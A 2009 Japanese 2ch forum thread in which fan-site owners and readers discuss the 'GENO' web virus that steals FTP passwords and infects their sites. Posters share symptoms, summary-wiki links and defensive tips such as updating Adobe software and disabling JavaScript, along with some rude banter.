【管理も】同人サイト・GENOウィルス注意5【閲覧も】

このエントリーをはてなブックマークに追加
1GENO
新種のコンピュータウィルスが流行っています。
感染サイトを見ただけで感染発症し、大半のアンチウィルスソフトで検知されません。
変化が早く、一部の検知可能なソフトも最新型には対応できていない状況です。
全ジャンルでサイト管理人・閲覧者に感染チェックを推奨します。

特にサイト管理人は二次被害を起こしてしまいますので、早急な確認が望ましいと思われます。

【よくある質問】
Q:感染するとどうなるの?
A:あなたのパソコンに侵入したウイルスは、
 FTPによる通信を行った時点でFTPのIDとパスワードを盗みます。
 そうなるとFTPでアップロードしたサイトのファイルに悪意を持ったコードが勝手に挿入され、
 そのサイトを見た人を感染させます。
 その他の個人情報が盗まれるのかどうかはまだわかっていません。

Q:VistaとMacは感染しないの?
A:某企業サイトでの発見直後はVista、Macには感染しないと言われましたが
 新種も現れており安心できる状況ではありません。

詳細・感染の確認方法・対策は以下のまとめWikiと>>2-5あたり

同人サイト向け・通称「GENOウイルス」対策まとめ
http://www31.atwiki.jp/doujin_vinfo/

【管理も】同人サイト・GENOウィルス注意5【閲覧も】
http://changi.2ch.net/test/read.cgi/doujin/1242503523/
2GE:2009/05/17(日) 15:03:21 ID:O6lqE1pR0
次スレは6だろw
3GENO:2009/05/17(日) 15:06:44 ID:TiyvNM1i0
AdobeReaderのセキュリ‍ティホールは週1回ブログをチェックするといいぞ

http://blogs.adobe.com/psirt/
4 :2009/05/17(日) 15:07:10 ID:E/MsRxtm0
当スレでは感染報告については、注意喚起の観点から

・感染が認められたジャンル名

のみ報告OKです。
感染報告をする際は、ジャンル名・ジャンル内シリーズ名など
伏字・略称にせず、わかりやすく書いてくだささい。

晒しやウォチ、風評被害を防ぐため、個人サイトを特定できる形で話題に出すのはNGです。
また、アドレス晒しは、踏むとマジで危ないので絶対厳禁。
5GE:2009/05/17(日) 15:07:47 ID:AeMaVHzC0
主な症状

・感染後にFTPに接続するとログイン情報が送信され勝手にFTP上のファイルを改竄される
・sqlsodbc.chmを改変
・cmd.exe、regedit.exeが起動不能
・一部のアンチウイルスソフトが更新不能
・特定サイトにアクセス不能(Windows Update、アンチウイルスソフト関連サイト)
・ネットワークのトラフィックを監視、ユーザー名やパスワード等の情報を収集している恐れ
・Googleの検索結果を改竄(リンクを弄る)
・explorer.exeや一部のブラウザが異常終了
・Acrobatが勝手に起動
・PDFファイルやシステムファイルが増殖
・CPU、メモリ使用率がUP
・再起動時にBSOD
6 :2009/05/17(日) 15:08:22 ID:E/MsRxtm0
主な症状
・感染後にFTPに接続するとログイン情報が送信され(?)勝手にFTP上のファイルを改竄される
・sqlsodbc.chmを改変
・cmd.exe、regedit.exeが起動不能
・一部のアンチウイルスソフトが更新不能
・特定サイトにアクセス不能(Windows Update、アンチウイルスソフト関連サイト)
・ネットワークのトラフィックを監視、ユーザー名やパスワード等の情報を収集している恐れ
・Googleの検索結果を改竄(リンクを弄る)
・explorer.exeや一部のブラウザが異常終了
・Acrobatが勝手に起動
・PDFファイルやシステムファイルが増殖
・CPU、メモリ使用率がUP
・再起動時にBSOD

次スレは>>900が立ててください
立てられないなら立てられないで極力早めに報告してください
7geno:2009/05/17(日) 15:12:41 ID:bpPdI6sj0
感染してしまう流れとして
埋め込まれたwebページの悪意のあるJavascriptが
旧版のflashPlayerまたはReaderのセキュリティホールを利用して(ここら辺が門外漢には想像つかないが)
PCに実行させる、という理解で合ってる?

逆を言えばPlayer、readerさえ最新版なら感染サイトを開いても大丈夫、と。
(もちろん現時点ではと加えるけど)
8GE:2009/05/17(日) 15:14:45 ID:oHgEWMxN0
●まずは何をしたらいいの?

1、自分が感染しているか確認
ttp://www31.atwiki.jp/doujin_vinfo/pages/12.html

2、自分のサイトが感染しているか確認
ttp://www31.atwiki.jp/doujin_vinfo/pages/16.html

3、閲覧先が感染しているか不安。
9GE:2009/05/17(日) 15:18:07 ID:oHgEWMxN0
誘導用

■何をしたらいいか分からない人はまずこれをする >>8
■よくある質問>>1
■主な症状 >>5
■自ジャンルで発見した場合 >>4

※まとめサイトの方が拾いやすいように、必ず>>1
アンカーを入れて報告してください。
10GENO Mac向けテンプレ簡略化:2009/05/17(日) 15:20:21 ID:PpsGdTEw0
>1 まとめwiki管理人様 対応ありがとうございます
BootCampや仮想環境同入社向けの不可視ファイル対処法・
ClamXavの使い方以前のテンプレをまとめました

■通称GENOウイルスに対するMacユーザー自衛法■
◆Adobe Flash Playerをチェック
ttp://www.adobe.com/jp/support/flashplayer/ts/documents/tn_15507.htm
 手持ちWebブラウズ環境でAdobe Flash Player のバージョンテストを行う
 10.0.22.87以上がAdobe対処済バージョン、それ未満なら最新バージョンに更新
 →ttp://get.adobe.com/jp/flashplayer/

◆Adobe Acrobat Readerをチェック
ttp://get.adobe.com/jp/reader/
 手持ちAcrobat Readerのバージョン情報が9.1未満なら最新版に差し替え
 さらにAdobe Updaterを使って9.1.1にアップデートする
 環境設定→JavaScript→Adobe JavaScriptの使用をオフにする
 MacOS 10.4と10.5ユーザーは「プレビュー.app」をPDFビューワーに利用する

◆その他
 10.3までの上記2ソフト動作保証外OSを使っている人は、Flash Playerと
AcrobatReaderを削除するかセキュリティソフトで監視体制を強化(両者の
ネットワーク通信を遮断)。

 各ブラウザとも。
  ・公式サイトから最新版をDLし導入すること
  ・DLファイルを自動的に開かないように設定する(SafariなどWebKit系)
  ・JavaScriptは常時オフ。必要な時だけ一時的に許可(オン)する習慣を。
  ・FirefoxユーザーはNoScriptやAdBlock+で二重の防御を。
 
 ClamXav、Intego、マカフィー、ノートンを使っている人は最新定義ファイル更新を行い
 信頼できるセキュリティ警告情報サイトのチェックを欠かさぬこと。
11GE:2009/05/17(日) 15:21:46 ID:oHgEWMxN0
ちょっと修正

誘導用

同人サイト向け・通称「GENOウイルス」対策まとめ
http://www31.atwiki.jp/doujin_vinfo/

■何をしたらいいか分からない人はまずここを見る。
http://www40.atwiki.jp/gegegeno/
何をすれば良いか良く分からない人用のまとめ

■よくある質問>>1
■主な症状 >>5
■自ジャンルで発見した場合
→まとめページを見て、重複がない場合は>>4

※まとめサイトの方が拾いやすいように、必ず>>1
アンカーを入れて報告してください。
12名前欄にスレ名入力推奨@自治スレ:2009/05/17(日) 15:25:50 ID:fLdOKUQi0
結局FTPのパス抜かれるってだけなんでしょ?
クレカの情報抜かれるとかPCが起動しなくなるとか全部ガセでしょ?
大騒ぎしすぎ。
13GENO:2009/05/17(日) 15:28:13 ID:Ps8iWQwH0
>>12
お花畑乙
14GE:2009/05/17(日) 15:28:44 ID:CCPNa2XB0
Photoshopとか割れ物使ってる人多いから
Adobe製品を丸ごとアップデートOFFにしてる人多そうだよね
そしてPDF ReaderやFlashまでアップデートされずにウイルスに狙われると
15GENO:2009/05/17(日) 15:32:05 ID:x35gg08k0
URLチェッカーで怪しいかどうか見極める基準って何?
16GENO:2009/05/17(日) 15:32:09 ID:s3+t6/cf0
>>12
BSOD出て泣けよ馬鹿www
17GENO:2009/05/17(日) 15:32:25 ID:uj1d73AxO
>>12
うちのPC、感染してからはいきなり強制終了が当たり前だったよ
落ちたら一時間は起動できないし
もともと壊れかけてた所にウイルスが来て瀕死だった
18geno:2009/05/17(日) 15:32:36 ID:1iiS6LwH0
で、Adobe Readerが最新なら踏んでもおkなのか?
19名前欄にスレ名入力推奨@自治スレ:2009/05/17(日) 15:33:31 ID:uXS1Ev/z0
>>12
ウィルスの亜種ができているみたいだから、
用心した方が良いですよ。
20GENO:2009/05/17(日) 15:33:36 ID:7bIAj8MN0
>>17
もう買い換えてやれよ
21GENO:2009/05/17(日) 15:33:36 ID:OMRGA0Ne0
>>15
まとめ嫁まとめ!
22GENO:2009/05/17(日) 15:35:19 ID:bw8aaOw10
>>11
初心者用wiki乙です
ところで管理人さん

■何をしたらいいのか分からない人用wiki
最初にやっておきたいこと
http://www40.atwiki.jp/gegegeno/pages/13.html

のoperaブラウザのところ、「javaを有効にする」チェックを外すってあるけど
「javascriptを有効にする」チェックを外すだけでいいんじゃないんだろうか
javaも外したほうがいいの?
23geno:2009/05/17(日) 15:35:27 ID:Il+SPzcZO
>>17
もうそのPCのライフは0よ!
24GENO:2009/05/17(日) 15:35:51 ID:Fkcw7XsL0
幸い感染はしてませんが、万が一感染した時のために聞いておきます。
感染したPCのワード文書や、HTMLファイルや画像をメモリースティックに避難させてから
パソコンをクリーンにして再インストールして、それから避難させたデータを
綺麗になったPCに戻しても大丈夫ですよね?
25名前欄にスレ名入力推奨@自治スレ:2009/05/17(日) 15:37:05 ID:fLdOKUQi0
>>19
まぁ用心してほとんどのサイト見ないようにしてるけどね。
でもここの連中は単に騒ぎ立てたいだけでしょ。
26GENO:2009/05/17(日) 15:37:28 ID:0KVXSW/Y0
>>24
感染する前に避難させておけよ
27geno:2009/05/17(日) 15:38:46 ID:U/BebqKb0
>>24
亜種が出ない限りわな
28 :2009/05/17(日) 15:38:51 ID:530g4Rq00
管理人さんによると、
Wikiからは他社のサイトの危険の調べ方を案内する必要はないとのことです。

ただ、現状でこのスレにおいてあまりにも適当に、何パーセントだから
どこどこのサイトが危ないとか言ってる人がいるので、自分でもう1回載せます
よそのサイトを調べるのは余力のある人のみやればいいことです


ソースを調べる方法(特定の1ページを調べるだけで、サイト全体を調べることにはならない)

●ソースチェッカーオンライン(http://so.7walker.net/guide.php )
 右側に表示されるソースを見て、Wikiの「サイト管理人向け」に
 あるようなおかしなコードの有無を調べる。
 ※ソース以外の情報(左下の「安全度」等)は一切無視する。

●手動
 調べたいリンク先を右クリックなどから保存する。
 保存されたHTMLファイルを右クリックなどから
 メモ帳などのテキストエディタで開き、Wikiの「サイト管理人向け」に
 あるようなおかしなコードの有無を調べる。
29geno:2009/05/17(日) 15:38:53 ID:C+ox2ku5P
ウィンドウズの五月付けのアップデートで悪質なソフトフェアの削除って
genoに対応してだしたやつ?
30名前欄にスレ名入力推奨@自治スレ:2009/05/17(日) 15:38:53 ID:HNKCDCrb0
>>24
PCに戻す前にバックアップしたデータをアンチウィルスソフトでスキャンしろ
仮にバックアップしたファイルにウィルスいたらどうするんだ
31geno:2009/05/17(日) 15:39:03 ID:/3OwKYN30
>>24
感染してからでは遅いだろ…
そんなのは今回のウイルスに限らずだぞ
こまめにバックアップとっとけ
32GE:2009/05/17(日) 15:39:12 ID:gL3wqKiX0
>>24

そういう大事な物は日ごろからバックアップとっておけよ。
33ggeno:2009/05/17(日) 15:39:36 ID:BKeJE78R0
自分は未感染だけど完全には把握しきれてない
図に描いてみたけどサイト運営者が
感染→拡散する経緯はこんな感じの無限ループ?
http://ranobe.com/up/src/up360236.gif
34geno:2009/05/17(日) 15:40:14 ID:gtO6gkLA0
AcrobatReader最新のにしたいんだけどRAMが推奨に僅かに足りない
現時点でも動作重くて仕方がないしもう諦めるしかない?
35geno:2009/05/17(日) 15:41:05 ID:xYIJLaYL0
http://geno.2ch.tc/ のGENOウイルスチェッカーを自サイトに利用させていただいたのですが
存在しないURLを入力しても
危険度0% 安全なURLです。踏んでも大丈夫でしょう。
と表示されてしまうのですが、大丈夫なのでしょうかね(後ほど、ソースチェッカーオンラインも利用しました)
36GENO:2009/05/17(日) 15:42:04 ID:75zIIRdD0
>>19
このウイルス自体の今回の挙動だけならそうかもしれない。
それだけの物を拡散する意図はどこにあるかっていうとな
コレを足掛かりにしてPCを乗っ取られる可能性もあるんだってこと。

>>24
htmlファイルは改竄されてる可能性も捨て切れないので
ローカルのバックアップも一応変なコード埋め込まれてないか
チェックしておいた方がいいらしい。
37geno:2009/05/17(日) 15:42:15 ID:bpPdI6sj0
>>34
もはやウイルスとは関係ないだろw
38geno:2009/05/17(日) 15:42:18 ID:ugI/Fqnf0
>>35
存在しないURLなんだから、踏んでも大丈夫だろ
39GE:2009/05/17(日) 15:42:55 ID:gL3wqKiX0
>>34

PC買い替えの問題だとおもうぞ。
40名前欄にスレ名入力推奨@自治スレ:2009/05/17(日) 15:43:15 ID:uXS1Ev/z0
>>34
Foxit Reader を試してみるとか?
ttp://www.forest.impress.co.jp/lib/offc/print/docviewer/foxitreader.html

とりあえず、acrobat reader は最新の状態にしておいた方が
安心かも。
41geno:2009/05/17(日) 15:43:21 ID:eIexCVOnO
avast導入して再起動したら、水色の画面?がでてデスクトップが出る前にスキャンが始まったんだけど、こういう仕様なの?
42名前欄にスレ名入力推奨@自治スレ:2009/05/17(日) 15:43:59 ID:S0k/XHY70
>>41
それもう感染してると思うぞ
43geno:2009/05/17(日) 15:44:07 ID:zvxfnoUI0
そういう仕様です
44名前欄にスレ名入力推奨@自治スレ:2009/05/17(日) 15:44:21 ID:9eiBh3qY0
>>41
ブートスキャン
45gn:2009/05/17(日) 15:44:23 ID:b4t5UBFOO
>>34
個人的に対策が自身にとってリスク負うなら
もう騒動終わるまでDL依然にネット自重した方がいいと思うんだ
46GENO:2009/05/17(日) 15:44:44 ID:7bIAj8MN0
>>41
たしか初回はリブートスキャンしたような
47GENO:2009/05/17(日) 15:44:44 ID:cmiSuKgz0
>>41
そうだよ
48 :2009/05/17(日) 15:45:05 ID:Kbc5xbJu0
>>33
そう。ただPCいじってる間に裏で改竄してるとか、
感染者のPCとは別の場所から改竄してるとか、
いろいろ考えられる
49GENO:2009/05/17(日) 15:45:05 ID:iVD93bW1O
>>33
セキュ板とのマルチ乙w
50同人向け”管理”人:2009/05/17(日) 15:45:09 ID:nbm7ZJwf0
>1の同人向けまとめWikiの管理をしてる者です。
自分宛(同人向けまとめWiki宛て)のレスは>1にアンカお願いします

>>10未処理(どう差し替えたらいいかわかんないけど今からやってきます)
>>28ありがとう
感染ジャンル一覧を更新する身としては非常に助かるレスです
(47まで確認)
51GENO:2009/05/17(日) 15:45:44 ID:fFSF+m6J0
ブラウザから直接掲示板に画像UPとか、おえかきBBSに投稿とかは
もし感染してたとしても大丈夫なのですか?
そういうサイトも見に行かない方が安全?
52GENO:2009/05/17(日) 15:45:44 ID:hgkEV6XJ0
>>24
完全に疑いが晴れるという事がないだろうから
すべてチェックするしかないと思いますよ
感染してからの事より
感染する前に行動しておく方が良いと思う
53GENO:2009/05/17(日) 15:45:54 ID:Mk4tVeWS0
>>41
仕様です
インスコ直後に「再起動後にスキャンがはじまる」的なダイアログが出たはず
54GENO:2009/05/17(日) 15:45:54 ID:7bIAj8MN0
>>1乙だわ
55geno:2009/05/17(日) 15:46:17 ID:xYIJLaYL0
>>38 その発想はなかったです。有難うございます
>>33 の画像が解りやすくていいですね
自分のパソコンは感染していないようですので、
早めに警告の文章をサイトに挙げておこうと思います
56GE:2009/05/17(日) 15:46:26 ID:CGESEChK0
>>41
ブートスキャン
windows上でのスキャンよりも、より精度が高いスキャンです。
avastは設定によるけど、ソフトインストール後最初にそれが行われる。

つまり、正常動作。
57GENO:2009/05/17(日) 15:46:51 ID:DtPRffqB0
ウィルスがもたらす実際の被害がたいしたことなくて、ウィルスに対する対策が簡単だとしても
自分が感染源となってサイト閲覧者にウィルスをばらまく可能性があり、
現時点では駆除方法はパソコンを初期化するしかなく、
感染したサイトはオンライン上の全ページ消去、
あらためてアップする時は全ソースをチェックしてきれいにした後、
もしくはいちから全部やり直しって時点で
オンやっている同人モノにとっては十分恐ろしいウィルスな気がする…
58geno:2009/05/17(日) 15:47:11 ID:CVXgkb/j0
とりあえずお気に入りサイトの管理人さんにお知らせメールおくた
59GENO 36:2009/05/17(日) 15:48:01 ID:75zIIRdD0
しまったレス番ミスった
×>>19 
>>25

現在原種対策済であろうと思われるアンチウィルスソフトどのくらいあるんだろう?



60GENO:2009/05/17(日) 15:48:08 ID:yytTYj0c0
>>33
ウィルスかわいいなー
61名前欄にスレ名入力推奨@自治スレ:2009/05/17(日) 15:49:38 ID:QRoiCEGS0
初期化前提ってことを考えると記憶喪失ウィルスってとこか
6234geno:2009/05/17(日) 15:49:40 ID:gtO6gkLA0
みんな優しいな。ありがとうございます
買い替えしばらく出来ないので、とりあえずFoxitReader見てみて
リスク背負うのとネット断ちどっちがいいか考えてみます
63GENO:2009/05/17(日) 15:49:50 ID:gigZ4JYYO
>>36
>PC乗っ取られる可能性
これきちんと認識してなくて「パス抜かれるだけでしょ?」って言ってる人大杉だよな
万一自分のPC踏み台にハッキング・クラッキングされたら
最悪自分がお縄になる事もありうるのに
つかウィルスに感染→真っ青、再起動不可能なんて他のウィルスだってやらかすだろ
64GE:2009/05/17(日) 15:50:09 ID:CGESEChK0
ウィルスが萌えキャラになっていきそうな気配
65名前欄にスレ名入力推奨@自治スレ:2009/05/17(日) 15:50:35 ID:Wzgj+9y70
まとめwikiの手順やって、感染はしてないみたいなんだが
avastに繋がらないんだ・・・これ感染してるの?
66GENO:2009/05/17(日) 15:50:47 ID:0z2qNNNj0
亜種がものすごい勢いで増えてる訳だけど、
それでも感染してるところをリストアップする気はないのか

検体共有しようや
67GENO:2009/05/17(日) 15:51:10 ID:Uh4GkfTkP
質問にレスする人は書き込む前にリロードして回答が重複してないか確認してください
68geno:2009/05/17(日) 15:51:30 ID:Il+SPzcZO
>>33
かわいいな
69名前欄にスレ名入力推奨@自治スレ:2009/05/17(日) 15:51:38 ID:QRoiCEGS0
亜種を増やしてる奴、捕まったら結構な重罪になるな
70GENO:2009/05/17(日) 15:51:45 ID:yytTYj0c0
>>65
皆詰めかけてて重いんじゃないの?
71geno:2009/05/17(日) 15:52:06 ID:CVXgkb/j0
>>57
PCの場合は人間みたいに自然治癒って
わけにいかないから困るね
72名前欄にスレ名入力推奨@自治スレ:2009/05/17(日) 15:52:32 ID:uXS1Ev/z0
>>62
ネット断ちはきついよw

windows update でコンピュータを最新の状態にして、
avast 入れて、flash player や adobe(foxit) reader を
最新の状態にしておけば、対策はとれるんだから。
ちょっと面倒かもしれないけど、がんがれ。
73GENO:2009/05/17(日) 15:52:51 ID:0z2qNNNj0
>亜種を増やしてる奴

自動生成だろ
74GE:2009/05/17(日) 15:53:39 ID:gL3wqKiX0
>>62
PCを軽くする方法はいくらでもあるから、それためしてみるのもいいぞ。
75geno:2009/05/17(日) 15:53:50 ID:BKeJE78R0
>>49
オレじゃねーっての…
76GENO:2009/05/17(日) 15:54:42 ID:qrS6OK3l0
>>75
気にスンナ
セキュ板愉快犯多いから
77GENO:2009/05/17(日) 15:55:14 ID:Fkcw7XsL0
ttp://windowsupdate.microsoft.com/

これって感染してないですよね??
なんか変な気もするんだけど・・・
78名前欄にスレ名入力推奨@自治スレ:2009/05/17(日) 15:56:27 ID:Wzgj+9y70
>>70
そう信じてみる、ありがとう。
79GENO:2009/05/17(日) 15:57:13 ID:JgYHTftB0
ID:Fkcw7XsL0は釣りということで
80GENO 質問:2009/05/17(日) 15:57:15 ID:XMIhkruoO
すいません。ちょっと質問させて下さい。

まとめサイトを参考に、感染してるか確認した所、.chmのボリュームは問題ありませんでした。
その後avast!を導入しようと思ったのですが、現在ノートンがPCにインストールされています。
この状態でavast!をインストールしても、問題はないのでしょうか。

セキュリティソフトを同時に2つ使用したことが無いので、心配になりました。
ご存知の方がいらっしゃいましたら教えて頂けますでしょうか。
81geno:2009/05/17(日) 15:57:32 ID:51mbC2Xz0
>>64
ウィルスを脳内擬人化してみたらブラックデビルになりました
笑えたけど萌えませんでした
8250:2009/05/17(日) 15:57:45 ID:nbm7ZJwf0
全然文が頭に入ってこないので寝てくる
>>10はこれ、Mac向けページの文とまるっと入れ替えるのん?
内容重複でスッキリ版に差し替えなのか、マカー板とかで>10で十分と出たのか
現在のマカー向け文の上とかに足せばいいのか
マカーさん指示お願い

(80まで確認)
83GENO:2009/05/17(日) 15:57:56 ID:8BxiMwcD0
>>64
仕方ないだろ、同人板だぜここはww
84GENO:2009/05/17(日) 15:58:20 ID:fFSF+m6J0
>>51
これわかるかた居らっしゃいませんか?
どこまで閲覧を自主規制したらいいかわからない。。
85GN:2009/05/17(日) 15:58:28 ID:Sl268vQ3O
これってFC2とかで直接ソースとか打ち込んでる人はどうなんかね
借りてるサーバーとか感染したら全体的に終わると思うが
86GE:2009/05/17(日) 15:58:27 ID:gL3wqKiX0
>>80

ふたついれなければいいだろうに
ノートンアンインストしてavastいれれば?
87GENO:2009/05/17(日) 15:59:07 ID:ayx8ivuJ0
adobeのフラッシュやリーダーは使う用途がなければ
アンインストールすることで対策完了としてもいいんだよね?
残すなら最新状態にしろってことで。
88GENO:2009/05/17(日) 15:59:10 ID:Fkcw7XsL0
>>79
ここ、昨日見たときとは見え方が違ってるんですが…
もしかしてjs切ってるから変に見えるんですか??
89GENO:2009/05/17(日) 15:59:16 ID:TD+9j9RM0
擬人化やるならよそでやってくれ
分かりやすく図解したものはまた別だろ…
90GENE:2009/05/17(日) 15:59:24 ID:p2nUS0pkO
>>78
ニフティのオンラインスキャンでも良いってきいた
やってみてはどうか?
91GENO:2009/05/17(日) 15:59:34 ID:JgYHTftB0
>>84
スレやまとめ読んでもその程度のことが分からないなら回線切ってください
真面目に
92GENO:2009/05/17(日) 15:59:37 ID:Ymau5dnd0
同人板なんだから、誰か漫画でわかりやすく描ける人がいると
初心者でも理解しやすいかも。
93げの:2009/05/17(日) 15:59:44 ID:DpQiMFyk0
今でこそまとめとか読んで対処できたけど
自分が厨房消防だったら多分テンパって質問書きまくってただろうな
わかりません><って言ってる人がガキだとか言いたい訳じゃないけど
94GENO:2009/05/17(日) 16:00:20 ID:iVD93bW1O
>>84
どこまでか自分で決められないなら全部見るなよ迷惑だから
95GENO:2009/05/17(日) 16:01:52 ID:29tYhPU70
>>92
さすがに必要ない。
あれだけわかりやすく書いてあってもわからないなら
もうPCを使っていい人間じゃないんだよ
ネットしないほうが世のため人のためってくらいだ
96 :2009/05/17(日) 16:03:55 ID:Kbc5xbJu0
>>84
サイト管理者がFTPでサイト更新してる場合はどんなサイトでも危険はある

自分が感染してて、そのまま(あるまじきことだが)
どっかの掲示板に画像投稿した場合、他人に感染させることはない(と現時点では思われる)
97GENO:2009/05/17(日) 16:04:07 ID:JgYHTftB0
>95
管雑で誰かが言ってたけど


      ______
    /          )))
   /   /// /―――-ミ
   / 彡彡 // /      ヽ))
   / 彡彡 iiiiiiiiiiiiiii  iiiiiiiiii|
   / 彡彡 < ・ > 、<・ >l
  /    |       ヽ   〉
  /  ( | |      __)  |    / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
  /   | ≡  /, ―――  |ゝ < 馬鹿共にパソコンを与えるな!
  /   |   |  L ___」 l ヾ  \_________
_ミ  l   ______ノ ゞ_
  |  l ヾ    ー   / |  l
  |  |   \ー    ‐/  |  |

まさにこれだな
98GENO:2009/05/17(日) 16:04:11 ID:HhGbn2rD0
>>84
そもそも自分のPCが感染しているのか、
投稿サイトが感染しているのかわかりにくいんだけど。

自分が感染→とにかく自分のPCを初期化
相手サイトが感染→わざわざ行くな
99GN:2009/05/17(日) 16:04:33 ID:Sl268vQ3O
>>93
だよな
多分厨房消防サイト持ってる子多いだろうし
急にこんなんなって皆焦ってるから尚…
そこを優しく教えてくれる人がいて欲しい子いるだろうよ
100げの:2009/05/17(日) 16:04:34 ID:qhiQaxgr0
>>85
そんな調子ならもうアカウントごと消せよ
よそに迷惑かけんな
101GENO:2009/05/17(日) 16:04:44 ID:Ch128Amx0
>>82

更新早いのは凄くありがたいけど無理しないでね
102GENO:2009/05/17(日) 16:06:23 ID:rtTOMlC70
広告の出る無料鯖でサイト運営してたとして
自分のサイトそのものは大丈夫でも無料鯖の広告出してくるとこが感染したらアウトなの?
それだとブログも安全と言い切れなくなるけど。
103geno:2009/05/17(日) 16:06:24 ID:CVXgkb/j0
同人ネットサーフできない間に管理人は
絵が描き溜められる、ということにしよう
104GENO:2009/05/17(日) 16:07:14 ID:yytTYj0c0
>>99
厨房消防には2ちゃんは早いおと言ってあげたい
105げの:2009/05/17(日) 16:07:49 ID:qhiQaxgr0
>>102
アカウント退会しよう
な?
106GENO:2009/05/17(日) 16:07:50 ID:MYTBJqff0
やっぱり幼稚園児が自動車運転してる

てめえの尻も拭けんのに勝手にハマりやがって
これ以上優しく説明しろだあ?
107GENO:2009/05/17(日) 16:08:00 ID:pCkMJ7qx0
どうしとけば安心なの?
ウィンドウズアップデートでファイル更新して、adobeのflash playerとacrobat reader更新して、
ノートン先生でファイアーウォール設定追加して、グーグルのプリフェッチ機能をオフにしたけど
この状態なら感染してるサイト見に行っても大丈夫になってる?
JavaScriptオフにすると見れないサイトとかあって不便なんだけども今はするしかない?
108げの:2009/05/17(日) 16:09:00 ID:KFLP4Q6J0
これ、どういう状態になったら「落ち着いた」になるの?
ストップすることはないよなあ
109GENO:2009/05/17(日) 16:09:13 ID:p6pp9GJl0
>>107
回線切る マジおすすめ
110GENO:2009/05/17(日) 16:09:23 ID:29tYhPU70
>>99
どう見ても消防厨房乙。

つか、どんなジャンルだよw
そう思うなら自ジャンルのお子さま達のために自力で作れ
111GENO:2009/05/17(日) 16:09:23 ID:dJ9RY7rM0
>>99
対処できないならサイトなぞ持つなと
112GE:2009/05/17(日) 16:09:25 ID:gL3wqKiX0
>>107
LANケーブル引き抜け。そしてネットにアクセスしなければ安心だよ。
113 :2009/05/17(日) 16:09:27 ID:Kbc5xbJu0
>>100
まだFTP以外のルートによる改竄は確認されてないっつの
114げの:2009/05/17(日) 16:09:45 ID:qhiQaxgr0
>>107
亜種が毎日増えてるから安心も糞もねーよカス
115geno:2009/05/17(日) 16:10:10 ID:Ecd/3Efh0
「こうすれば大丈夫」ってのを誰かが知ってると思ってるのがねー
ウイルスに聞いた方がいいんじゃね
116GENO:2009/05/17(日) 16:10:20 ID:fFSF+m6J0
>>96,98
私のパソコンは感染してませんでした、取れる対策はしましたが、
画像うpサイトで感染した人がうpしてそれ見た人が感染するのかわからなかったもので。
どうも有難うございました。
117げーの:2009/05/17(日) 16:10:23 ID:DYq+r29a0
みんなavastいれろって書いてるけど、AVGのフリーじゃまずいのかな?
118GENO:2009/05/17(日) 16:10:37 ID:5Cm5d2oJ0
>>106
これ以上となると「うちに来て代わりにチェックしてください」
っていうレベルだよね
11950:2009/05/17(日) 16:11:22 ID:nbm7ZJwf0
Wikiへの直接連絡で
キャプ翼とファイアーエムブレムの感染報告があったので
追加しました
(109まで確認)
>>101ありがとノシ
120 :2009/05/17(日) 16:11:23 ID:vAsZKX8p0
>>114
お前は必要以上に不安を煽るなカス
121ジーノ:2009/05/17(日) 16:11:23 ID:en3OEJg6O
バカとガキはPC持たない
携帯も持たない

これ徹底。以上!
122GENO:2009/05/17(日) 16:11:41 ID:kIijijTH0
>>113
話が噛みあってないんだけど
123GENO:2009/05/17(日) 16:11:44 ID:oZ1trJyb0
>>88
To continue, you must first add this website to your trusted sites in Internet Explorer.

こんな文字と椎茸が出てきます?
javascript 切っているからだと思う。
124GENO:2009/05/17(日) 16:11:53 ID:LaB+hZinO
自分で考えることを覚えて下さいまじで
125GENO:2009/05/17(日) 16:13:10 ID:kIijijTH0
>>120
あ?事実だろ
ファイルさっさと消して終わりってだけの馬鹿は死ねよ
126GENO:2009/05/17(日) 16:13:31 ID:pCkMJ7qx0
>>108
俺もそれが知りたい

>>114
結局何やっても安心できないのか
127GN:2009/05/17(日) 16:14:00 ID:Sl268vQ3O
>>118
今現にそれだ
128GENO:2009/05/17(日) 16:14:45 ID:UfGd8Ae00
なんでここすぐ煽りたがる人がいるんだろうか
129GENO:2009/05/17(日) 16:14:47 ID:PpsGdTEw0
>102
アウト
去年のXREA広告サーバハッキングはそれで被害が拡大した

Adobe Flash Playerの脆弱性およびXREA広告サーバハッキング問題まとめ
ttp://www.geocities.jp/pehchunpm/mondai_XREA.htm
130GENO:2009/05/17(日) 16:14:49 ID:94GIamPZ0
ウィルス対策ソフトで感染を防げるようになったら、じゃねーの?
そしたらみんな安心だろ
131geno:2009/05/17(日) 16:15:34 ID:0tAEYsh+0
「じゃあどうすれば!」とか「どうすれば安心なの!?」って書いてる人に言いたい
人にものを尋ねるときに、すでに用意されたまとめもろくすっぽ読まずに
どうしてそんなに偉そうな態度なんだ? おばさんか?
基本的に用意されたまとめとこのスレ読めば全部わかるでしょ
132GENO:2009/05/17(日) 16:15:50 ID:Qk4iTuLX0
>>108
アンチウイルスソフトで予防だけじゃなく駆除できるようになれば、
少しずつ下火になってくれるとは思う。
「スキャンして、みつかったら駆除しろ」で済むし。
133 :2009/05/17(日) 16:16:09 ID:vAsZKX8p0
>>129
しかしそういうものが今後出てくるとすればこのウイルスとは別物だろう
134GENO:2009/05/17(日) 16:16:59 ID:8BxiMwcD0
家の窓からPC投げ捨てるAAあったよな、誰か貼ってくれ
135げの:2009/05/17(日) 16:17:18 ID:KFLP4Q6J0
>>122
ああ、そうか
まだアンチウィルスソフトがきちんと対応してないんだもんな
月曜日になったらまた事態もかわるかな
136 :2009/05/17(日) 16:17:26 ID:CG6fmaxh0
>>131
「現状ではなんとも言えない」ことを聞く人も多い
137GENO:2009/05/17(日) 16:17:28 ID:aRynEcEM0
>>128
昨日から、調べればわかることを何もせずに聞いてくる奴ばっかで
みんなイライラしてんだよ
138GENO:2009/05/17(日) 16:17:44 ID:FFClEI90O
いつ落ち着くかなー。それまでパソコン触らないぜ
139geno:2009/05/17(日) 16:18:11 ID:fY1e0kll0
ノートンとかバスターとかメジャーなところが対応して
ワクチンができて再インストール以外の対処ができるようになると大分落ち着くだろうから
現状感染していない人で知識がない人はそれまでネットを繋がないのがもっとも安全だと思うよ

仕事でどうしてもつかわなければいけない人であればなにがなんでも対応しろ
趣味で閲覧する程度なら少しの間我慢だね
140GENO:2009/05/17(日) 16:18:18 ID:kIijijTH0
>>128
女とゆとりと馬鹿しかいないから
141GENO:2009/05/17(日) 16:18:27 ID:ky2W6LNJ0
某サイト閲覧中にWindowsのセキュリティ警告が出たけど(OSはVista)
コマンドプロンプトとレジストリエディタは開けた
